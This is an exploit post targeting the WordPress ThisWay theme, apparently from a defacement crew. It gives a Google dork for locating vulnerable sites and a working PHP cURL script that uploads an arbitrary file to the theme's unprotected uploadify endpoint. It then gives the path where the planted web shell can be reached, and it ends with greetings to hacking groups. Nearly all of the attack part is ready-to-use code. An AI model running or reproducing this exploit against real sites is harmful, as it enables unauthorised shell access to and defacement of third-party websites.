_________ .___ _____ _____ _______ _________ __ .__ / _____/__ __ ____ __| _// | | ____ ___.__. / \ \ _ \ __ __________ \_ ___ \ _________________ ________________ _/ |_|__| ____ ____ \_____ \| | \/ \ / __ |/ | |_/ < | |/ \ / \/ /_\ \| | \___ / / \ \/ / _ \_ __ \____ \ / _ \_ __ \__ \\ __\ |/ _ \ / \ / \ | / | \/ /_/ / ^ / | \___ / Y \ \_/ \ | // / \ \___( <_> ) | \/ |_> > <_> ) | \// __ \| | | ( <_> ) | \ /_______ /____/|___| /\____ \____ ||___| / ____\____|__ /\_____ /____//_____ \ \______ /\____/|__| | __/ \____/|__| (____ /__| |__|\____/|___| / \/ \/ \/ |__| \/\/ \/ \/ \/ \/ |__| \/ \/ ######################################################################################## #Exploit title: WordPress ThisWay theme - Arbitrary File Upload Vulnerability #Author: Bet0 #Google Dork: inurl:"/wp-content/themes/ThisWay/" #Date:1 November 2013 #Vendor Homepage: http://themeforest.net/ #Themes Link: http://www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/ #Tested on: Windows 7 ######################################################################################## [+]EXPLOIT <?php $uploadfile="upl.php"; $ch = curl_init("http://[localcrot]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> [+]SHELL ACCSES http://[localcrot]/wp-content/uploads/[year]/[month]/[search your shell].php [+]Twitter: https://twitter.com/Defacto_ID [+]REGARDS To: All member Sund4nyM0uz Corporation,Explore Crew, Trackc0de Crew, Malang Cyber Crew, Indonesian Coder, HN-Community, and My Girl :*